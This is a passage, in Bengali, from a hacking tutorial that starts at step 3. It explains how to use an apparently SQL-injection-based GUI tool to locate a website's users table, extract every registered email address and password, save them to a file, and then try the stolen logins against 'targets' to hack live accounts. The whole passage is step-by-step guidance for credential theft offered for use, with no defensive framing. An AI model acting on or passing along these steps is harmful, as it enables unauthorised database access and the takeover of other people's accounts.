৩.এখান থেকে এবার আপনাকে users বক্স টি খুজে সিলেক্ট করতে হবে। (একটা কথা>>> আপনি অন্যান্য সাইটে member/regester ইত্যাদি ট্যাবল গুলায় আইডি গুলো পেতে পারেন ) user ট্যাবল সিলেক্ট করে এবার Get Columns ট্যাব এ ক্লিক করুন। ৪. এরপর আপনি vUserID, vPassword, vUserName , vEmailAddress, vAccountType ………. বক্স পাবেন। এবার এখান থেকে আপনি শুধু vEmailAddress এবং vPassword বক্স সিলেক্ট করে Get Data ট্যাব এ ক্লিক করুন। ৫. এরপর আপনি্ন একটি একটি করে সাইটে রেজিষ্টার হওয়া সকল ইমেইল এবং পার্সওয়ার্ড পাবেন। ডান পাশে Save Data নামের একটি ট্যাব আছে। সবগুলো আইডি এবং পার্সওয়ার্ড পাওয়ার পর সেখানে ক্লিক করলে আপনি ইমেইল এবং পার্সওয়ার্ড গুলো ফরম্যাটে ফাইলে সেভ করতে পারবেন। ৬. এখন আপনি আপনার সেভ করা html ফাইলটা ওপেন করুন। এবং এক এক করে আপনার টার্গেট গুলা চেক করুন। আশা করি ব্যপার টা আপ্নারা সবাই বুঝতে পেরেছেন। কোন রকম অপেক্ষা ছাড়া এভাবে আপনি লাইভ আইডি হ্যাক করতে পারবেন। সবাই ভালো থাকবেন।